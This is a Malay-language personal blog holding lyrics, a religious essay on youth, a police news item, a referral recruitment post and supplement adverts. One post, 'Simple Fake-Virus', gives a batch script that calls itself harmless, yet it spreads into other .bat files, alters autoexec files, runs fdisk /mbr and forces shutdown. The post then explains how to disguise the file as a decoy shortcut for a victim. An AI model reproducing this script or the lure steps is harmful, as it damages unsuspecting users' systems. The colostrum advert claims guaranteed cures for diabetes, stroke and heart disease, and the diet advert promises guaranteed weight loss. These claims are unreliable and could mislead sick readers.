attaurie's Blog
Just another WordPress.com weblog

Apr
13

Semangat baru
Perjuangan yang satu
Dan matlamat hidupku
Hanya untukmu

Tapi keadaanmu
Berikan aku
Berikan aku satu petanda
Prasangka
Aku kalah

Rasa resah jangan kau percaya
Dalam hatimu.. (dalam hatimu)
Rasa resah jangan kau percaya
Kata hatimu.. (kata hatimu)

Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..

Persepsi diri
Ada maksud sendiri
Dan propaganda ku rasa
Luar biasa

Tapi keadaanmu
Berikan aku
Berikan aku satu petanda
Prasangka
Aku kalah lagi

Rasa resah jangan kau percaya
Dalam hatimu.. (dalam hatimu)
Rasa resah jangan kau percaya
Kata hatimu.. (kata hatimu)

Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..

Ekstravaganza
Ekstravaganza
Ekstravaganza
Ekstravaganza

Rasa resah jangan kau percaya
Dalam hatimu.. (dalam hatimu)
Rasa resah jangan kau percaya
Kata hatimu

Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..
Wooo.. wooo..

*moga terhibur…

by attaurie

Apr
08

94 hours of regret for me to realize what I held
unfading beauty, not just a face
I held its innocence within my heart
Go!
No I won’t let go
I won’t let go
I won’t let go
no i
I won’t let go
no i
I won’t let go
The torment of your eyes has awakened my soul.
The torment of your eyes has awakened my soul.
The pain of a moment’s time will forever beg your forgiveness
Forgiveness
94 hours for me to realize
I held the unfading beauty
I am your innocence

kpd cpe2 yg mnt lagu diatas atau cpe2 yg mnt lagu2 screamo, metal, n hardcore (terutama kpd gurlsz yg lyn lgu2 hardcore.. hehe..), plss add me at myspace n fb k?? nie emel sy.. fikrin_emo@yahoo.com… Thnx..

(p0st by FiKrIn)

Apr
06

Polis sedia berkhidmat,

Kerna negeri dan rakyat,

Hidup berbahagia,

Aman sentosa,

Polis sedia berkhidmat.

Tanda lekat di lengan,

Polis dengan pereman,

Tangan bersalaman,

Alamat persahabatan…

Apr
06

Polis Diraja Malaysia (PDRM) semalam menampilkan sebanyak 25 buah kereta peronda berprestasi tinggi jenis Mitsubishi Evolution X (Evo-10) yang bakal digunakan oleh anggota polis dalam usaha mempertingkatkan keupayaan tugas-tugas rondaan. Kereta baru ini bertujuan untuk mempertingkatkan keberkesanan penyampaian perkhidmatan yang lebih berkualiti serta membolehkan pasukan polis sampai ke kawasan kejadian jenayah dengan lebih pantas. Kereta peronda berkuasa tinggi yang baru dilancarkan itu dilengkapi dengan enjin serba baru iaitu enjin aluminium 4B11T 2.0 L turbo dengan transmisi manual lima kelajuan. Rasanya memang patut pun PDRM pakai kereta berprestasi tinggi macam Evo X untuk tugas2 membanteras jenayah lagipun supercar buatan Jepun ni lebih ekonomikal dan mudah diselenggara…

by http://krsuicide.com/2009/03/25/pdrm-kini-guna-supercar-evolution-x/

Apr
02

Simple Fake-Virus

  • Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:\tmp.bat >null attrib +r +s +h c:\tmp.bat echo for %%i in (*.bat) do copy c:\tmp.bat+%%i %%i >>c:\windows\system32\autoexec.NT
echo echo virus detected! >>c:\windows\system32\autoexec.NT
echo pause >>c:\windows\system32\autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:\autoexec.bat
echo echo system hault-virus identified! >>c:\autoexec.bat
echo chkdsk >>c:\autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0x00000000000000000000000000000000000”

This code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)

Preparing the Virus

  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the “virus” into Notepad
  4. Click File -> Save as
  5. Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
  6. Change “.txt” to “All files” in the file type drop-down menu
  7. Chose a harmless filename. Replace the “.txt” at the with “.bat”
  8. Click on save and close Notepad.

Making a fake Icon

Now, that we have our Virus saved, we should prepare a decoy:

  1. Right click on the desktop and go over to “new” then click “short cut”.
  2. For the location of the short cut chose our Virus.
  3. Click next
  4. Give the shortcut a name that your victim will click on. (“Music for free”, “My Documents”, “Critical Windows-Update” “Get Free Cinema-Tickets” or “Internet Explorer”)
  5. Click on “Finish”
  6. Right click on the shortcut you have just made and chose “properties”. Now click on the “chose icon” button and scroll through the list of icons.
  7. Decide for one of the icons that fits well to the name, chose it by clicking on it and hit OK twice.




Mar
16

Kalo males pipis di toilet, telpon toilet delivery aja..

kalau la malaysia ade toilet macam ni???kan best…hahahaha

Mar
05

Bagaimana cara nak register?

1. klik http://www.catcheye.com.my/?r=78540

2.klik join catcheye now

3.Isi maklumat diri,IC dan alamat (penting sebab cek dihantar berdasarkan ini selepas cukup RM50)

4.Isi jawapan:

soalan 1 jawapan A (atas sekali),

soalan 2 jawapan B (yang tengah),

soalan 3 jawapan A (atas sekali).

p/s (jika jawab salah pendaftaran tidak diterima)

5.klik agree and proceed..

Ok siap??

kemudian apa perlu buat?

1.klik sign in

2.lepas sign in klik reward panel

3.Anda lihat akaun anda ade RM1 (bonus) dan link anda.

4.Copy link anda dan gantikan link saya ini dengan link anda sendiri.

5.postkan risalah saya ni di buletin facebook atau myspace & emailkan kepada kawan2.

6.Lihatlah tak sampai sebulan awak dah ade 10 orang di level 1.

percayalah!

sebab benda ni 100% percuma REZEKI TUHAN YG BG..TP KITA KNE USAHA JUGAK KAN??

TGGU APE LG?? J0MLA J0IN.. =)

klik, klik, klik

by virushitam

Feb
17

Peringkat remaja adalah peringkat usia yang mempunyai ke-inginan yang kuat, semangat yang tinggi, cita-cita yang besar serta kesanggupan mencurahkan khidmat bakti dan pengor-banan. Peringkat ini juga adalah pcringkat usia yang mudah mempelajari, dipengaruhi dan mudah menurut perasaan.

Oleh itu usia remaja menurut pandangan Islam mem-punyai tanggungjawab dan nilai yang khusus. Rasulullah s.a.w. sangat mengambil bcrat khususnya dalam menyedarkan para remaja tentang perkara ini. Sabda Rasulullah s.a.w.:

Bermaksud:
Rebutlah lima perkara sebelum tiba lima perkara: Ketika muda sebelum tua, ketika sihat sebelum sakit, ketika kaya sebelum miskin, ketika hidup sebelum mati dan ketika masa lapang sebelum masa sibuk.

(Riwayat al-Hakim)

Seorang remaja muslim yang berupaya memenuhi masa mudanya dcngan menguatkan jalinan hubungannya dengan Allah, melawan hawa nafsu dan berusaha mendalami serta menghayati Islam dengan kefahaman yang scbenar akan mudah meneruskan cabaran kehidupan tanpa bcrasa lemah atau kecewa.

Manakala remaja yang tidak mcmenuhi masanya dcngan perkara bermanfaat, maka sudah pasti dia akan ketinggalan dan sukar untuk mcndapatkannya kembali sesudah bcrlalu usia mudanya. Ini kerana lazimnya para remaja tidak dibebani pada peringkat usianya dcngan bebanan hidup yang banyak. Sudah tentulah orang yang tidak mcmikul beban tidak sama dengan orang yang telah berkahwin dan dibebani dengan pclbagai tanggungjawab.

Kita dapat melihat berapa ramai orang yang menycsali diri kerana tidak memanfaatkan waktu muda mereka dcngan sebaik-baiknya. Mereka dibayangi dengan pelbagai pcrsoalan. “Mengapakah aku tidak berusaha mcndekatkan diriku kepada Allah dan mclakukan kctaatan kepada-Nya dengan bertahajjud, berpuasa dan berzikir? Mengapakah aku tidak berusaha menghafaz al-Qur’an dan mempelajari hukum agama? Meng-apakah aku tidak berusaha mcngenal jalan yang lurus demi mengamalkan ajaran Islam? Mengapa? Dan mengapa?” Kesemua persoalan ini telah dan bakal dihadapi oleh para remaja yang hanyut tenggelam dalam keseronokan dunia dan kemudian dihimpit rasa penyesalan.

Cuba kita bayangkan seandainya diri kita berada di tempat mereka. Cuba kita bayangkan yang diri kita tcrlalu sibuk hingga tidak ada masa untuk membaca al-Qur’an, qiyamullail, mendalami ilmu pengeahuan dan mempelajari ilmu agama. Cuba kita bayangkan bahawa kita amat mengharapkan agar dapat kembali semula kc hari yang pcnuh kelapangan dan tidak dibcbani dengan tanggungjawab agar kita dapat mcmenuhi kesemua apa yang kita impikan.

Ketika itu katakanlah kepada diri kita sendiri, “Engkau sckarang berada dalam kcadaan penuh pengharapan. Engkau sebenarnya masih mcmpunyai waktu lapang dan bclum dibcbani dcngan tanggungjawab. Ayuh! Bcramallah sekarang selagi masa masih ada!!”

Namun begitu, sebelum kila beramal, kita perlu me-ngenal pasti petunjuk jalan yang manakah akan kila lalui kclak. Dengan kata lain, apakah tanggungjawab yang dituntut kc atas remaja Islam? Insya-Allah tanggungjawab tersebul akan ditcrangkan di Icmbaran sctcrusnya nanti.

Saya berdoa agar sumbangan saya ini diterima dan di-jadikan petunjuk ke arah kebaikan. Semoga Allah meng-ampunkan dosaku dan menggolongkan aku bersama saudaraku di dalam syurga. Hanya Dialah sahaja yang mcmberi petunjuk kc jalan yang lurus.

<<bersambung>>

by attaurie…..attaurie@gmail.com

Feb
07

Melaka,

HAJIJAH        0193089085

ISKANDAR    0148899234

90% cubaan untuk menguruskan badan gagal….

Adakah anda tergolong didalam peratusan itu?????

Katakan TIDAK!!selesaikan masalah berat badan anda sehingga 10kg selama 30 hari secara sihat , selamat dan semulajadi.

Tidak perlukan senaman, mudah diikuti, dalam masa yang singkat.

Keberkesanan dijamin 100%

Tahukah anda??Bagaimana untuk dapatkan nutrisi lengkap dan seimbang??

-Pakar pemakanan menyatakan bahawa,kita terpaksa makan 4000 kalori dalam sehari untuk dapatkan nutrisi lengkap dan diperlukan badan.

Apa yang akan berlaku sekiranya kita makan 4000 kalori ?

Secara purata, lelaki membakar  2200 kalori sehari,

manakala wanita hanya 1800 sehari.

Kemana perginya lebihan 2000 kalori lagi????

Tentunya ke sel-sel lemak kita dan inilah sebabnya berat badan kita semakin hari semakin naik dan penampilan kita menjadi kurang menarik!

SELAMAT, BERKESAN,

PENGURANGAN BERAT YANG MAKSIMUM

MENJIMATKAN

DIJAMIN MEMUASKAN HATI ANDA

PLAN INI ADALAH MUDAH

Tiada peraturan yang rumit untuk diikuti &amp; anda akan mencapai keputusan yang diidam-idamkan.

Ianya senang SATU, DUA, TIGA….

Makanan yang disarankan ketika menjalani program.

Makanan berprotein :

# Ayam ( tanpa kulit )

# Daging

# Cheese / keju

# Ikan

# Makanan laut ( udang, ketam, dll )

# Kambing

Sayuran segar :

# Asparagus

# Kobis

# Lobak

# Cendawan

# Tomato

# Bawang

# dan sayur-sayuran lain.

**Tidak digalakkan mengambil makanan berkarbohidrat tinggi, seperti nasi dan roti.

Saranan sihat Slim Diet II

  1. Pilih makan yang hanya didalam jadual makanan,hindarkan makanan yang tidak terkandung di dalam jadual makanan anda.
  2. Reka aturan makanan anda yang menyediakan 20-35g jumlah karbohidrat sehari atau ikut menu makanan yang disediakan.
  3. Goncang SDII sebelum dibuka.Skup ada disediakan didalam tin.
  4. Campurkan 2 skup SDII di dalam 200/250 ml air sejuk di goncang di dalam shaker dan di ambil 4 kali sehari.
  5. Anda disarankan untuk minum sekurang-kurangnya 2 liter air sehari. ( air sejuk  )
  6. Kurangkan atau tidak mengambil minuman yang berkafein seperti coklat, kopi, teh kerana kafein akan melambatkan pembakaran lemak.
  7. Bersenam sebanyak 30 minit sehari seperti berjalan kaki.

PERINGATAN!!!!!

  • Bagi ibu mengandung di sarankan agar tidak mengambil program pelangsing berat badan.
  • Bagi pesakit diabetic adalah perlu mendapatkan nasihat doktor untuk mengawasi anda sepanjang pengambilan program.
  • Sila rujuk kepada doktor anda mengenai program ini jika anda mengambil ubat-ubatan.

CARA PENGAMBILAN :

  • Campurkan 2 skup SDII di dalam 200/250 ml air sejuk digoncang di dalam shaker.
  • Diambil 4 kali sehari,sebelum makan.

NOTES : Elakkan penggunaan air panas atau air suam.

Slim Diet II

“Protein sparing modified fast concept”

Hasil kajian yang lepas menunjukkan SDII memberikan 100% keberkesanan kehilangan berat badan berlandaskan konsep PSMF ( Protein Sparing Modified Concept )

Setiap badan manusia mempunyai 2 punca tenaga iaitu:

  1. Makanan yang dimakan.
  2. Kandungan lemak yang terkumpul.

Apabila anda mengurangkan pengambilan karbohidrat ( gula &amp; kanji ) didalam badan,kandungan lemak untuk tenaga di dalam tubuh menjadi rendah secara semulajadi.

Jumlah kandungan karbohidrat yang menjadi penyebab rendah lemak di sebut sebagai CCL ( Critical Carbohydrate Level ).Apabila rendah lemak ketones akan terhasil dan ini adalah proses yang disebut sebagai ketosis.

SDII berfungsi mempercepatkan proses pembakaran lemak dan juga dapat mencegah rasa lapar yang keterlaluan.

KELEBIHAN program SDII :

  1. Diet sihat bagi menurukan berat badan secar semulajadi.
  2. Berkesan dan selamat.
  3. Melangsingkan tubuh dan mendapat bentuk badan yang ideal.
  4. harapan baru bagi kawalan berat badan untuk jangka masa panjang yang baik dan menyihatkan.
  5. Menyediakan bahan kandungan yang lengkap dan mencukupi seperti protein yang berkualiti tinggi, vitamin, muneral dan elemen-elemen yang diperlukan tubuh secara seimbang.
  6. Mengekalkan struktur kulit yang asal dan cantik.
  7. Menghapuskan seluruh kandungan lemak yang terkumpul.
  8. Kelihatan dan berasa lebih baik.
  9. Tiada rasa lapar.
  10. Tiada kesan yang memudaratkan.

Bagi anda yang berminat,sila hubungi ejen terdekat :

Melaka,

HAJIJAH        0193089085

ISKANDAR     0148899234

Jan
30

“Kolostrum adalah SELAMAT.Ia telah disediakan oleh alam semulajadi sebagai makanan awal mamalia.Adalah sukar untuk membayangkan makanan tambahan lain yang lebih semulajadi dan berfaedah.”

-International Institute of Nutritional Research,USA.

“SIHAT SECARA SEMULAJADI UNTUK ANDA SEISI KELUARGA”

Mengapa Alpha Lipid ????

# Antibodi Semulajadi

~ meningkatkan sistem imun

~ meneutralkan patogen pembawa penyakit

(antifungal , antivirus, antibakteria )

# Faktor Pertumbuhan

~ penyembuhan

~ pembaik pulih

~ mambakar lemak

# Vitamin &amp; Mineral

~ Lengkap dengan Vitamin A,B,C,D dan E

~ antioksida ( awet muda )

~ nutrisi

~ meningkatkan fungsi otak ( GD3 )

# Kalsium

~ menguatkan struktur tulang dan gigi

# Probiotik &amp; Prebiotik

~ Fungsi usus dan penghadaman yang baik

( lactobacillus acidophillius )

# Formula eksklusif Lipid

~ kadar serapan hampir 100%

~ lebih berkhasiat dan berkesan

Apa penyakit yang Alpha Lipid boleh atasi???

  • Sindrom Metabolisma
  • Ingatan dan emosi
  • Tekanan Darah Tinggi
  • Arthritis &amp; Sakit Sendi
  • Osteoporosis
  • Buah Pinggang
  • Diabetes
  • Strok
  • Jantung
  • Kekedutan

Adakah ini benar.????YaJaminan 100% berkesan..

Apa kata mereka????


Tn Haji Sharif Bin Sidang Tunggal ( 97 tahun )

Lubuk China,Melaka

“Sebelum saya diperkenalkan pada kolostrum Alpha Lipid ini,saya sering mengalami kegelisahan yang tidak menentu dan juga sukar mendapat ketenangan diri.Pada peringkat umur saya 97 tahun ini,saya sering gatal-gatal dan kemerahan-merahan.Setelah saya di perkenalkan dengan kolostrum Alpha Lipid ini,selepas 3 Tin penggunaannya,saya telah dapat merasakan perubahan yang amat ketara pada diri saya, dimana saya menjadi lebih ceria dan bertenaga berbeza dari sebelumnya dan juga masalah kulit yang sering gataldan kemerah-merahan pada seluruh badan saya juga sudah tiada lagi dan kini kulit saya telah nampak lebih bersih dan tiada lagi kemerah-merahan.Saya yakin kolostrum Alpha Lipid  ini memang amat bermutu dan berkualiti tinggi dan saya yakin kolostrum Alpha Lipid ini adalah semulajadi dan selamat untuk digunakan untuk semua lapisan masyarakat.Oleh itu, saya amat yakin untuk meneruskan menggunakan kolostrum ini di masa hadapan.”

Tn Haji Md Dali Bin Haji Sharif ( 70 tahun )

Durian Tunggal,Melaka


“Pada tahun 1995,saya telah disahkan oleh doktor di Hospital Pakar menghidapi penyakit darah tinggi dan kencing manis.Akibat dari pergantungan ubatan yang berterusan sehingga kini,ianya telah memberi kesan sampingan yang kronik pada abdomen buah pinggang saya dimana ianya tidak boleh berfungsi dengan baik dan sempurna.Alhamdulillah berkat dari mendengar rancangan di radio FM Melaka saya telah diperkenalkan oleh En.Nasir mengenai kolostrum Alpha Lipid dimana pada peringkat awalnya saya telah mengambil 3 Tin dan selepas 3 bulan penggunaan kolostrum Alpha Lipid ini saya mendapati perubahan yang amat ketara pada bacaan tekanan darah tinggi saya iaitu 180 menurun ke 120 dan begitu juga bacaan bagi penyakit kencing manis saya pada awalnya 19.5 telah menurun kepada 6 atau 7.Saya amat begitu yakin dengan penggunaan kolostrum Alpha Lipid ini mampu memberikan saya tenaga dan juga dapat memulihkan penyakit yang telah saya hidapi ini.Saya menyeru kepada mereka yang mempunyai masalah kesihatan di luar sana segeralah mendapatkan kolostrum Alpha Lipid ini kerana ianya amat semulajadi dan selamat dan juga bagus untuk kesihatan seisi keluarga.”


LIPUTAN KERATAN AKHBAR TEMPATAN




Anda boleh menempah sekarang

PN.HAJIJAH         0193089085

ISKANDAR              0148899234

Harga : Bukan ahli RM180/Tin

Ahli            RM150/Tin

CARA GUNA:

Serbuk

Minggu Pertama 1 skup sehari

Minggu Kedua & seterusnya 2 skup sehari ( pagi sekali &amp;  malam sekali )

Masukkan air sejuk dahalu, baru masukkan Alpha Lipid dan goncangkan ( shake )

PESANAN ; Diambil sebelum sarapan pagi ( perut kosong )

PERINGATAN : Elakkan penggunaan air panas dan air suam.

ALPHA LIPID LIFELINE Melaka FM 102.30 ahad jam 04.45 petang

Untuk maklumat lanjut,

PN.HAJIJAH    0193089085

ISKANDAR         0148899234

Follow

Get every new post delivered to your Inbox.